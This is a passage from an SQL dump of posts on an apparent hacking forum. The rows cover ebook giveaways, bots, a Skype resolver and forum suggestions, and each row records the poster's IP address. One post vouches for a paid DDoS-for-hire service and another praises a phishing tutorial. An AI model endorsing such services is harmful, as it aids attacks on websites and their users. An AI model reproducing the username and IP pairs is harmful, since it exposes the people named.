Alright. Well. I just made like 10+ threads. I\'m done. + PMed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '567a30a4272f36e3041e3a96041c7849', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1895', '412', '1892', '7', 'RE: 400th Thread', '0', '82', 'iTzIpod', '1347573907', 'Also just noticed I got 400 posts :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0271b12a5676c5d3097b1446865d8233', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1896', '407', '1887', '29', 'RE: Instagram Bot [Mass Like]', '0', '61', 'NXK', '1347583839', 'Trying this out now, Ill let you know how it goes. Not really working.', '99.253.94.204', '1677549260', '1', '0', '61', '1347584454', '1', '5dd975a45e33cba49e50a814f585e320', '0', '1347584454'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1897', '345', '1876', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347586277', '[quote=\'R?????zo?\' pid=\'1876\' dateline=\'1347550339\'] I tried, not sure if you like it though. [img]http://i.imgur.com/iD3g6.png[/img] [img]http://i.imgur.com/QXFt5.png[/img] [/quote] I really like the 2nd one. It\'s very good. I would try out for this, but I can\'t.. I mean. I don\'t have any good fonts. I have bad taste in fonts...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '63564be93d04e76b2008a7555dd3f80b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1898', '407', '1896', '29', 'RE: Instagram Bot [Mass Like]', '0', '82', 'iTzIpod', '1347586424', '[quote=\'NXK\' pid=\'1896\' dateline=\'1347583839\'] Trying this out now, Ill let you know how it goes. Not really working. [/quote] It\'s not? :/ I didn\'t try it. I just got it from a friend. :/ Sorry. :( If I get a better version, I will release it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '65ddc6ae190d5dc5f8bd57528719e91b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1899', '413', '0', '29', 'EARN $50/HOUR EASILY', '0', '82', 'iTzIpod', '1347586825', '[align=center]Money Making eBook 1. Daily Payout. 2. Does not include a Black Hat method. 3. Easy money. 4. Little to no hard work. 5. Make a nice amount of money. Download: [url=http://www.mediafire.com/?4a79dtzxu7t66dm]CLICK[/url] Proof of the money making. [IMG]http://www.godviden.dk/paypal_payment.png[/IMG] Enjoy. [/align]', '24.212.197.164', '416597412', '1', '0', '82', '1347799296', '1', '8c9fce63f44f3036e26d6f5192d03040', '0', '1347799296'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2127', '413', '2108', '29', 'RE: EARN $50/HOUR EASILY', '0', '82', 'iTzIpod', '1347799380', '[quote=\'Timmy\' pid=\'2108\' dateline=\'1347748778\'] Is it auto and can you fix the codes? [/quote] Can you stop asking if it\'s auto? Like seriously why not just download the damn thing.. Or atleast view it.. Just change the URL to http://www.mediafire.com/view/?4a79dtzxu7t66dm', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a61e6ec74e35dc6c2cfd6e83164d1410', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2128', '446', '2106', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1347799483', '[quote=\'t3h jok3r\' pid=\'2106\' dateline=\'1347748611\'] I agree with Baws and he had some work to do @ iTzIpod. [b]He was the first active member on LH.[/b] [/quote] He deserves a cookie.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb76d264568622fc9900a6d5dddcc4c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1900', '414', '0', '29', 'Maximize Profits Using Google Adsense', '0', '82', 'iTzIpod', '1347587006', 'Hello! This will help you use AdSense to the fullest. Enjoy. [url=http://lh.rs/UCqlTRhXklJT] Download [/url] [url=http://r.virscan.org/report/affac294b7849c3c34976ff0311f52ee.html] Virus Scan[/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '041207579067c9f28204498fc877db86', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1901', '415', '0', '59', '2000+ eBooks', '0', '82', 'iTzIpod', '1347587134', 'USE AT YOUR OWN RISK ( Most PDF files are viewed online ) I\'m not gonna download all of these and redistribute them since it would take forever. A thanks is appreciated. [spoiler][url=http://hightechmodz.com/E-Books.html]HTM E-Books[/url][/spoiler] Enjoy!', '24.212.197.164', '416597412', '1', '0', '82', '1347587160', '1', 'c2ed44a02414d90f7d301effe0d2dd84', '0', '1347587160'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1902', '416', '0', '29', 'Earn Money from Captcha', '0', '82', 'iTzIpod', '1347587730', 'Download Link: [url=http://localhostr.com/vr3KUrJLbyV6] Click[/url] Virus Scan: [url=http://https://virustotal.com/file/713569990b574b280a1c6e88bf4e39b7bb596a435bc46757af9d84cdbdf50a32/analysis/1346992578/] Click[/url]', '24.212.197.164', '416597412', '1', '0', '82', '1347588519', '1', '2809b16877d17c7de454dc71aa76ec63', '0', '1347588519'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1903', '400', '1880', '59', 'RE: Free Pizza method', '0', '82', 'iTzIpod', '1347590168', 'To view it: http://www.mediafire.com/view/?8wzfg850302yrd8 Wow. Just read it.. It\'s the stupidest thing you can come up with. It\'s not worth 10 cents... Instead of selling it for money, you basically have to pay someone to take it instead....', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b5a589a99e4bfe560e33b42ca350565', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1904', '401', '1881', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '61', 'NXK', '1347591326', 'Damn I thought I was the only one who knew about this...', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '5558743a7984f6166524cccb8c1adff6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1905', '399', '1869', '3', 'RE: [Bug] Error', '0', '1', 't3h jok3r', '1347593566', 'Solved. Thanks for the report', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e2017d0bc6d2e29e7a385811c2c6b966', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1906', '412', '1892', '7', 'RE: 400th Thread', '0', '1', 't3h jok3r', '1347593867', 'Congratz on the 400 threads LH and 400 posts iTzIpod, the more activity we have the more backlinks we will have which means more HQ members.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd638f232541712554cc8976cbe15adaa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3735', '735', '0', '59', 'Ultimate Bitcoin Guide! Earn for playing games & More!', '0', '1', 't3h jok3r', '1349586132', 'Method 1: To earn, while playing games.. go here - http://cur.lv/4sfx The best way to win is by betting 0.001 and then choosing 4 mines. You can earn so easily that way and hard to lose! Method 2: Earn like adfoc/adf.ly Earn per bitcoins per click by signing up here - http://n.cur.lv/Coin Method 3: Earn money by leaving a page open for 5 minutes and then pressing next. You can earn a lot on this website - http://cur.lv/4sg7 Method 4 (autopilot): This website is a little confusing to understand, but by signing up, you are added to a random payout machine. The most you can receive is however much money you have deposited plus .01 BTC. Payouts happen at .021 BTC, and they charge a payout fee of .001 BTC. - http://cur.lv/4sgf Note: I did not make this ebook. No credits to me', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5982d36d896fa06f5935139644e3e0a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1908', '401', '1881', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '1', 't3h jok3r', '1347594152', '/moved. Moved to the tutorials section. Nice tutorial, seems like it was a private method on getting Skype Resolvers for free.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8ca92abece9a51b654064bc030e2037e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1909', '416', '1902', '29', 'RE: Earn Money from Captcha', '0', '5', 'Timmy', '1347594242', 'What are the payment methods and what is the minimum payout requirement?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ede4b748b87af27ce6d6a95c3da8f78b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1910', '351', '1651', '46', 'RE: Phishing Tutorial', '0', '5', 'Timmy', '1347594364', 'Nice tutorial. It\'s well-detailed and useful for n00bs', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4e791ed1de09da210d69ff91c15d460f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1911', '417', '0', '4', 'HI!', '6', '184', 'Homeless', '1347595892', 'My name is Homeless, I like computers and computer related stuff. I\'ve been searching for a good hacking forum, hope I\'ve found it! :hehe:', '75.48.249.244', '1261500916', '0', '0', '0', '0', '1', '220ff03f8ad1acb8fd809f2e9680a829', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1912', '315', '1867', '61', 'RE: Welcome to Unique\'s HQ', '0', '62', 'R?????zo?', '1347619686', '[quote=\'iTzIpod\' pid=\'1867\' dateline=\'1347536967\'] [quote=\'R?????zo?\' pid=\'1864\' dateline=\'1347524860\'] Thanks for accepting me :) I will gladly contribute with my unique skills, specially GFX :) [/quote] I love your GFX! ;) You have talent. [/quote] thanks, let me know if you need anything done.', '89.214.79.243', '1507217395', '1', '0', '0', '0', '1', '9d7b50d317185136938ca768a8b72979', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1913', '412', '1892', '7', 'RE: 400th Thread', '0', '2', 'Apathy', '1347623156', 'This is a great achievement.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '3228e26df008ac4b894ebc334c05f319', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1914', '18', '49', '2', 'RE: star test', '0', '2', 'Apathy', '1347623309', 'The theme we are using clashes with it. :/', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'c99947d93ed830774917fe9d93e2fe6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1915', '406', '1886', '30', 'RE: Skype Fake Quote Generator', '0', '2', 'Apathy', '1347623367', 'That is awesome thanks for the share.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '7af1c417973284b6cf8b4eb19e2a583c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1916', '404', '1884', '30', 'RE: Sony Vegas Pro 11.0 & After Effects', '0', '2', 'Apathy', '1347623415', 'Have you used these personally?', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '70d662c20e1ff8fa5c05abee5e1a4868', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1917', '417', '1911', '4', 'RE: HI!', '0', '61', 'NXK', '1347623933', 'You\'ve come to the right place, we\'re still growing but give us some time!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '96e43acb7ba3e74a5454eb65590727ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1918', '417', '1911', '4', 'RE: HI!', '0', '82', 'iTzIpod', '1347628110', 'Welcome to L33t Hacking! Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '198c73adab24427266fed3e8bafd03a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1919', '412', '1906', '7', 'RE: 400th Thread', '0', '82', 'iTzIpod', '1347628172', '[quote=\'t3h jok3r\' pid=\'1906\' dateline=\'1347593867\'] Congratz on the 400 threads LH and 400 posts iTzIpod, the more activity we have the more backlinks we will have which means more HQ members. [/quote] Thanks! :D @Apathy, Gratz on 100 posts :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '001568e0f99fd6f62a762d2f22b5cfac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1920', '416', '1909', '29', 'RE: Earn Money from Captcha', '0', '82', 'iTzIpod', '1347628295', '[quote=\'Timmy\' pid=\'1909\' dateline=\'1347594242\'] What are the payment methods and what is the minimum payout requirement? [/quote] Payment Methods: Western Union, Paypal, Liberty Reserve. Minimum Payout: I don\'t know. But I do know it works.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe6203bd4cd379e284396fd0bb3693cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1921', '404', '1916', '30', 'RE: Sony Vegas Pro 11.0 & After Effects', '0', '82', 'iTzIpod', '1347628346', '[quote=\'Apathy\' pid=\'1916\' dateline=\'1347623415\'] Have you used these personally? [/quote] Yes I have. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fd5dfe9564bfb4fd6e91284753252f24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1922', '406', '1915', '30', 'RE: Skype Fake Quote Generator', '0', '82', 'iTzIpod', '1347628413', '[quote=\'Apathy\' pid=\'1915\' dateline=\'1347623367\'] That is awesome thanks for the share. [/quote] No problem. Just trying to give more to the community.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9f0df830aa015a33b1bd633fea99c009', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1923', '401', '1904', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '82', 'iTzIpod', '1347628507', '[quote=\'NXK\' pid=\'1904\' dateline=\'1347591326\'] Damn I thought I was the only one who knew about this... [/quote] Lol sorry. :/ If you want I can delete the thread and move it to the Elite Section? That way only Elite members can view it. Instead of leechers.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'db0fc4631e6e2553a9b0bf335a2bd67c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1924', '315', '1912', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1347628608', '[quote=\'R?????zo?\' pid=\'1912\' dateline=\'1347619686\'] [quote=\'iTzIpod\' pid=\'1867\' dateline=\'1347536967\'] [quote=\'R?????zo?\' pid=\'1864\' dateline=\'1347524860\'] Thanks for accepting me :) I will gladly contribute with my unique skills, specially GFX :) [/quote] I love your GFX! ;) You have talent. [/quote] thanks, let me know if you need anything done. [/quote] I don\'t wanna spam. So I will PM you. =] Thanks again for making my Group seem successful :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '77ad0e03ac61b10d325fac75d3515688', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1925', '418', '0', '16', '[eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1347630216', 'Hey everyone. iTzIpod here with a special giveaway for the community. This is my SEing tutorial for beginners. I wrote this all myself. I spent a couple days working on it. 1.7 days to be exact. Anyways Here is the download link: MediaFire: [url=http://www.mediafire.com/?1c303xmmmbotoc4] Click[/url] MediaFire [To View]: [url=http://www.mediafire.com/view/?1c303xmmmbotoc4] Click[/url] Mirror [LocalHostr]: [url=http://lh.rs/sM0y3Mcad1pu] Click[/url] Mirror [DropBox]: [url=https://www.dropbox.com/s/4muhvsk82h1qtpq/SEing%20Tutorial.pdf] Click[/url] Virus Scan: [url=https://www.virustotal.com/file/73f018076efd1ca6eee496446c4755870d2093b53b26946d06d792dab119a849/analysis/1347630046/] Click[/url] Enjoy! Any way of thanks is appreciated. - iTzIpod L33tHacking.net Once a L33t, Always a L33t.', '24.212.197.164', '416597412', '1', '0', '82', '1347630241', '1', '4c4b853d45e1dc179df4a939bea48ab7', '0', '1347630241'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1926', '419', '0', '49', '[Suggestion] Signature Characters + for + Members', '0', '82', 'iTzIpod', '1347630708', 'Hey, I want to suggest for L33t Hacking that Upgraded/+ Members get an additional amount of characters for their signature. Because for now, Members (Normal) have a max characters of 255. And Upgraded Members have 255 max characters too. I just wanna lift that by a little. Doesn\'t have to be too much or anything.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9accf86465a4186b00ead2489d0dd66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1927', '420', '0', '49', '[Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '82', 'iTzIpod', '1347631082', 'Whenever I try to edit [b]MY[/b] threads, I get this error: [img]http://i.imgur.com/AsEml.png[/img] But I find that kind of unfair. Since Upgraded members shouldn\'t need to have that. Or Mods.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8d02753679c0751eaf0127cc6cde4187', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1928', '420', '1927', '49', 'RE: [Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '67', 'HoverCatz', '1347631245', 'yea its bad, and remove the Minimum char count in the reply box please. Its so easy to get around, but annoying to do all the time. [hr] I cant post 2 replies. -.-', '178.74.56.137', '-1303758711', '1', '0', '67', '1347631322', '1', 'cdfefdcad053a328580e5f65d87adc1a', '0', '1347631322'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1929', '421', '0', '49', '[Suggestion] Upgraded Members get no waiting time', '0', '82', 'iTzIpod', '1347631417', 'I\'m guessing this is a bad suggestion.. But it\'s worth a try. I don\'t know what the waiting time is for normal members. But I still feel that the Upgraded Member\'s waiting time is still too much. If we can either reduce that or remove that just for the upgraded members, that would be great.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ebc9770a451123beb6b7cc33f10ce78c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1930', '401', '1923', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '61', 'NXK', '1347632093', '[quote=\'iTzIpod\' pid=\'1923\' dateline=\'1347628507\'] [quote=\'NXK\' pid=\'1904\' dateline=\'1347591326\'] Damn I thought I was the only one who knew about this... [/quote] Lol sorry. :/ If you want I can delete the thread and move it to the Elite Section? That way only Elite members can view it. Instead of leechers. [/quote] Nah leave it, it\'s public. Let the leechers leech.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '2a06c0fe628cdd8cbec8f904dcabb1c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1931', '401', '1930', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '82', 'iTzIpod', '1347632962', '[quote=\'NXK\' pid=\'1930\' dateline=\'1347632093\'] [quote=\'iTzIpod\' pid=\'1923\' dateline=\'1347628507\'] [quote=\'NXK\' pid=\'1904\' dateline=\'1347591326\'] Damn I thought I was the only one who knew about this... [/quote] Lol sorry. :/ If you want I can delete the thread and move it to the Elite Section? That way only Elite members can view it. Instead of leechers. [/quote] Nah leave it, it\'s public. Let the leechers leech. [/quote] Leeching is bad though :/ I hate leechers.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '31db1a93cc92bb42683fc9db3073ae11', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1932', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1347633352', 'Very nice service. I vouch this. =] Worked and DDoSed a website in less than 5 minutes for 1 hour+ =] Legit. VOUCH.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2be6c26ed4b443fb494f094d90e8bc80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1934', '18', '49', '2', 'RE: star test', '0', '61', 'NXK', '1347633523', 'I\'m not a fan of the green everyone else got a update accept smods ahah :(', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '91807011d8b2f06bf1c4654fc49cb518', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1937', '423', '0', '9', 'Earn money by Copy & Pasting', '0', '82', 'iTzIpod', '1347636154', 'Hey LH In this short method I\'m going to show you how to make some quick cash on a daily basis. In fact, this is probably the simplest way to make instant money. Anyone can do that without having any prior experience or marketing skills. If you know how to do simple \"copy-paste\" operations, you already have excellent chances to succeed with this method. You can make around $50-$60 a day. Title: Easy Copy & Paste Money Pages: 17 Investment: 0 Virus Scan: [url=https://www.virustotal.com/url/af320fb038817f7cebf4dd9e905629273ffa290861c3c660e365bc5f65c55182/analysis/1347583863/] Click[/url] Download here:[url=http://www.filemsg.com/2phedwmzzbdw]Click [/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bf0a36ea278d29f29de30597aed5651c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1938', '424', '0', '61', 'Money Making eBooks', '0', 